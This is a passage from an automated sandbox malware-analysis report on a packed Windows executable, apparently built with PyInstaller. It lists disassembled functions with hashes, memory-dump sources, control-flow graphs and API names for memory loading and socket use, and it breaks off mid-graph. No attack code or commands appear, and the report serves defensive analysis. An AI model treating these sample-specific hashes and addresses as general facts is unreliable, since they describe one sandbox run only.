                                                                                                                                                                                                                                  • Instruction ID: 0f42d6d80485d7b6fbc43b351bd6952dfa6df33c6b14883ac2b59153edbb9100
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 996235B2629196C6E72A8E39D4002BD76A4F748785F045532FE9EC37C4EA7CEA46C710
                                                                                                                                                                                                                                  Function 00007FFBA43E1F40 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950013415.00007FFBA43E1000.00000080.00000001.01000000.00000018.sdmp, Offset: 00007FFBA43D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949827954.00007FFBA43D0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43DD000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949877226.00007FFBA43E0000.00000040.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950056718.00007FFBA43E3000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba43d0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                                                                                                  • Opcode ID: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
                                                                                                                                                                                                                                  • Instruction ID: 781b2b0039b25904322650a8100a91240965d83e8975d33540ed3278c1c6e251
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 036248A262A996C6E7168F38D68137D76D0F748385F049531EE9EC37D4EA3CEA45C700
                                                                                                                                                                                                                                  Function 00007FFBA4220350 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FFBA4170000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949454231.00007FFBA4170000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4171000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41BA000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA41C8000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                                                                                                  • Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                  • Instruction ID: 3ef9a4119493f3a9deb14fae3bc6a968633ac4c185ca2253c089d0b7189f7bc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 536226A262929286E7569F38D4803BD7690FB48785F045531EF9EC37D8EB3DEA45C700
                                                                                                                                                                                                                                  Function 00007FFBAA4953DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: bind
                                                                                                                                                                                                                                  • String ID: bind$socket.bind
                                                                                                                                                                                                                                  • API String ID: 1187836755-187351271
                                                                                                                                                                                                                                  • Opcode ID: 4ce2c3a6d91a333172a2df15937caee8bf14d916a7314e4ad852e3007f95126b
                                                                                                                                                                                                                                  • Instruction ID: b5d34503a7ef505f6fdf06f95cd464f27f9198677361a8eaa1232b8878993bc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ce2c3a6d91a333172a2df15937caee8bf14d916a7314e4ad852e3007f95126b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44111FA160AB82C2F6619B72F4C03AE6368FB48B85F500176EE8D47B55DF2CE4168760
                                                                                                                                                                                                                                  Function 00007FFBA67B2250 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: :memory:
                                                                                                                                                                                                                                  • API String ID: 2201947777-2920599690
                                                                                                                                                                                                                                  • Opcode ID: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
                                                                                                                                                                                                                                  • Instruction ID: c8f843ef5a73fec094caad790b2fece6fa97a529507ae3e412c90ee11e6d7360
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D428DE2A1B78282EB668B35E46437927A6FF89F84F044135CE5E43794DF3DE8958340
                                                                                                                                                                                                                                  Function 00007FF72C659280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                  • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                  • Instruction ID: 99c73fc6a28612792b6c6d8362d0e314c348d17b3c172c1cdf7a5882f38cef59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6F0C822A1C74286F7619B60B889776B351FB94378F940735DA6D02AD4DF3CD059CE00
                                                                                                                                                                                                                                  Function 00007FFBA67A1230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                  • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                  • Instruction ID: 6cf64ddf6925ade6ad7a789c46a20d62bf2fa4e98a1cdc2f9a6d29a560448237
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60A12BE0A1BB0682FE5BCB75E86427422AABF65F44F540576CD4D867A0EF3DE4988340
                                                                                                                                                                                                                                  Function 00007FFBAA49660C Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                                                  • Opcode ID: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                                  • Instruction ID: 33bf675215fd5496f05ce3ff225a58cf6b303d5b671ded3f4e95729b0050f1ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE01AF2A15A45C2D7245B66E0806687364F719FA4F245721DE380B3D0DE28D8E6C740
                                                                                                                                                                                                                                  Function 00007FF72C651950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1840 7ff72c651950-7ff72c65198b call 7ff72c6545c0 1843 7ff72c651c4e-7ff72c651c72 call 7ff72c65c550 1840->1843 1844 7ff72c651991-7ff72c6519d1 call 7ff72c657f90 1840->1844 1849 7ff72c651c3b-7ff72c651c3e call 7ff72c66004c 1844->1849 1850 7ff72c6519d7-7ff72c6519e7 call 7ff72c6606d4 1844->1850 1854 7ff72c651c43-7ff72c651c4b 1849->1854 1855 7ff72c651a08-7ff72c651a24 call 7ff72c66039c 1850->1855 1856 7ff72c6519e9-7ff72c651a03 call 7ff72c664f08 call 7ff72c652910 1850->1856 1854->1843 1861 7ff72c651a45-7ff72c651a5a call 7ff72c664f28 1855->1861 1862 7ff72c651a26-7ff72c651a40 call 7ff72c664f08 call 7ff72c652910 1855->1862 1856->1849 1870 7ff72c651a7b-7ff72c651afc call 7ff72c651c80 * 2 call 7ff72c6606d4 1861->1870 1871 7ff72c651a5c-7ff72c651a76 call 7ff72c664f08 call 7ff72c652910 1861->1871 1862->1849 1882 7ff72c651b01-7ff72c651b14 call 7ff72c664f44 1870->1882 1871->1849 1885 7ff72c651b35-7ff72c651b4e call 7ff72c66039c 1882->1885 1886 7ff72c651b16-7ff72c651b30 call 7ff72c664f08 call 7ff72c652910 1882->1886 1891 7ff72c651b6f-7ff72c651b8b call 7ff72c660110 1885->1891 1892 7ff72c651b50-7ff72c651b6a call 7ff72c664f08 call 7ff72c652910 1885->1892 1886->1849 1900 7ff72c651b8d-7ff72c651b99 call 7ff72c652710 1891->1900 1901 7ff72c651b9e-7ff72c651bac 1891->1901 1892->1849 1900->1849 1901->1849 1904 7ff72c651bb2-7ff72c651bb9 1901->1904 1906 7ff72c651bc1-7ff72c651bc7 1904->1906 1907 7ff72c651bc9-7ff72c651bd6 1906->1907 1908 7ff72c651be0-7ff72c651bef 1906->1908 1909 7ff72c651bf1-7ff72c651bfa 1907->1909 1908->1908 1908->1909 1910 7ff72c651bfc-7ff72c651bff 1909->1910 1911 7ff72c651c0f 1909->1911 1910->1911 1912 7ff72c651c01-7ff72c651c04 1910->1912 1913 7ff72c651c11-7ff72c651c24 1911->1913 1912->1911 1914 7ff72c651c06-7ff72c651c09 1912->1914 1915 7ff72c651c2d-7ff72c651c39 1913->1915 1916 7ff72c651c26 1913->1916 1914->1911 1917 7ff72c651c0b-7ff72c651c0d 1914->1917 1915->1849 1915->1906 1916->1915 1917->1913
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C657F90: _fread_nolock.LIBCMT ref: 00007FF72C65803A
                                                                                                                                                                                                                                  • _fread_nolock.LIBCMT ref: 00007FF72C651A1B
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                  • Opcode ID: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                  • Instruction ID: 05d1e98607e00c0932de05aeb01288415088a65e3b3c311ea904c174ccc401cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85b25b29a176bc83ae3a1b74fdbb3e17cfe2198aa0bc5e09dcfbdbd9a14dfb03
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D981D671A0C68286EB22FB14DC412B9B3A2FFA47A4FE04435DA8D43785DE3CE5458F60
                                                                                                                                                                                                                                  Function 00007FFBAA495E54 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 234networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1918 7ffbaa495e54-7ffbaa495ea5 call 7ffbaa4993d0 1921 7ffbaa495eb3-7ffbaa495ed8 call 7ffbaa499348 1918->1921 1922 7ffbaa495ea7-7ffbaa495eb1 1918->1922 1929 7ffbaa495eda-7ffbaa495edd 1921->1929 1930 7ffbaa495f2e 1921->1930 1922->1921 1923 7ffbaa495ef3-7ffbaa495f01 1922->1923 1926 7ffbaa4960c6-7ffbaa4960d6 call 7ffbaa499528 1923->1926 1927 7ffbaa495f07-7ffbaa495f0f 1923->1927 1940 7ffbaa496103-7ffbaa496132 call 7ffbaa4937cc getsockname 1926->1940 1941 7ffbaa4960d8-7ffbaa4960e1 call 7ffbaa499588 1926->1941 1931 7ffbaa495f57-7ffbaa495f60 1927->1931 1932 7ffbaa495f11-7ffbaa495f28 call 7ffbaa4994b8 1927->1932 1934 7ffbaa495ee3-7ffbaa495eed 1929->1934 1935 7ffbaa49619e-7ffbaa4961f4 call 7ffbaa499568 WSASocketW call 7ffbaa499490 1929->1935 1937 7ffbaa495f33-7ffbaa495f56 call 7ffbaa4929f0 1930->1937 1938 7ffbaa495f68-7ffbaa495fb9 1931->1938 1932->1930 1934->1923 1934->1935 1955 7ffbaa4961fa-7ffbaa496201 1935->1955 1938->1938 1939 7ffbaa495fbb-7ffbaa49602e call 7ffbaa499348 1938->1939 1939->1930 1953 7ffbaa496034-7ffbaa496076 call 7ffbaa499568 WSASocketW call 7ffbaa499490 1939->1953 1956 7ffbaa496134-7ffbaa496137 1940->1956 1957 7ffbaa496140-7ffbaa496143 1940->1957 1941->1930 1954 7ffbaa4960e7-7ffbaa4960fe call 7ffbaa4994e8 1941->1954 1961 7ffbaa496078-7ffbaa49607d call 7ffbaa494da4 1953->1961 1978 7ffbaa496082-7ffbaa496092 SetHandleInformation 1953->1978 1954->1930 1960 7ffbaa496207-7ffbaa496225 call 7ffbaa494740 1955->1960 1955->1961 1962 7ffbaa496139-7ffbaa49613e 1956->1962 1963 7ffbaa49615a-7ffbaa49615e 1956->1963 1957->1961 1964 7ffbaa496149-7ffbaa496154 WSAGetLastError 1957->1964 1976 7ffbaa49622b-7ffbaa49622d 1960->1976 1977 7ffbaa49609c-7ffbaa4960a5 closesocket 1960->1977 1961->1930 1962->1963 1965 7ffbaa496199-7ffbaa49619c 1963->1965 1966 7ffbaa496160-7ffbaa49618e getsockopt 1963->1966 1964->1961 1964->1963 1965->1960 1966->1961 1971 7ffbaa496194 1966->1971 1971->1965 1976->1937 1977->1930 1979 7ffbaa496094-7ffbaa496096 call 7ffbaa499548 1978->1979 1980 7ffbaa4960aa-7ffbaa4960c1 1978->1980 1979->1977 1980->1960
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
                                                                                                                                                                                                                                  • String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
                                                                                                                                                                                                                                  • API String ID: 141981615-2881308447
                                                                                                                                                                                                                                  • Opcode ID: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
                                                                                                                                                                                                                                  • Instruction ID: b05b5a4407e1e0f580f83ba9db571c37406b979269f9d217eeee24e95b1540a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DB1D6A2A09A81C2F6228F35D4C42BC7364FB94BA4F145375EE6D036A1DF3CE596C310
                                                                                                                                                                                                                                  Function 00007FFBAA49746C Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 260COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1982 7ffbaa49746c-7ffbaa497510 call 7ffbaa4993e0 1985 7ffbaa497516-7ffbaa497521 1982->1985 1986 7ffbaa49782e 1982->1986 1987 7ffbaa497523-7ffbaa497526 1985->1987 1988 7ffbaa497528-7ffbaa497536 1985->1988 1989 7ffbaa497830-7ffbaa497850 1986->1989 1990 7ffbaa497571-7ffbaa497580 1987->1990 1991 7ffbaa497538-7ffbaa49754e call 7ffbaa4995d8 1988->1991 1992 7ffbaa49755a-7ffbaa49755e 1988->1992 1993 7ffbaa49759c-7ffbaa4975a6 1990->1993 1994 7ffbaa497582-7ffbaa497591 call 7ffbaa499410 1990->1994 1991->1986 2006 7ffbaa497554-7ffbaa497558 1991->2006 1996 7ffbaa497564-7ffbaa49756a call 7ffbaa499590 1992->1996 1997 7ffbaa497817-7ffbaa497828 call 7ffbaa4994e8 1992->1997 2000 7ffbaa4975c7-7ffbaa4975cb 1993->2000 2001 7ffbaa4975a8 1993->2001 2010 7ffbaa4977d4-7ffbaa4977d7 1994->2010 2011 7ffbaa497597-7ffbaa49759a 1994->2011 2013 7ffbaa49756d 1996->2013 1997->1986 2007 7ffbaa4975d3-7ffbaa4975da 2000->2007 2008 7ffbaa4975cd-7ffbaa4975d1 2000->2008 2005 7ffbaa4975ab-7ffbaa4975b7 call 7ffbaa499328 2001->2005 2005->2010 2024 7ffbaa4975bd-7ffbaa4975c5 2005->2024 2006->2013 2015 7ffbaa4977bd-7ffbaa4977ce call 7ffbaa4994e8 2007->2015 2016 7ffbaa4975e0 2007->2016 2014 7ffbaa4975e3-7ffbaa497611 call 7ffbaa499348 2008->2014 2018 7ffbaa4977d9-7ffbaa4977dc 2010->2018 2019 7ffbaa4977ed-7ffbaa4977f0 2010->2019 2011->2005 2013->1990 2014->1986 2027 7ffbaa497617-7ffbaa497662 call 7ffbaa499568 getaddrinfo call 7ffbaa499490 2014->2027 2015->2010 2016->2014 2018->2019 2023 7ffbaa4977de-7ffbaa4977e2 2018->2023 2025 7ffbaa497806-7ffbaa49780d 2019->2025 2026 7ffbaa4977f2-7ffbaa4977f5 2019->2026 2023->2019 2029 7ffbaa4977e4-7ffbaa4977e7 call 7ffbaa4992f0 2023->2029 2024->2014 2025->1986 2028 7ffbaa49780f-7ffbaa497815 FreeAddrInfoW 2025->2028 2026->2025 2030 7ffbaa4977f7-7ffbaa4977fb 2026->2030 2037 7ffbaa497668-7ffbaa49766b 2027->2037 2028->1986 2029->2019 2030->2025 2033 7ffbaa4977fd-7ffbaa497800 call 7ffbaa4992f0 2030->2033 2033->2025 2038 7ffbaa49766d-7ffbaa49767d call 7ffbaa494dd8 2037->2038 2039 7ffbaa497682-7ffbaa497690 call 7ffbaa499350 2037->2039 2038->2010 2039->2010 2044 7ffbaa497696-7ffbaa49769d 2039->2044 2045 7ffbaa4976a3-7ffbaa4976ba call 7ffbaa494b80 2044->2045 2046 7ffbaa49774a-7ffbaa49774d 2044->2046 2054 7ffbaa4977a6-7ffbaa4977aa 2045->2054 2055 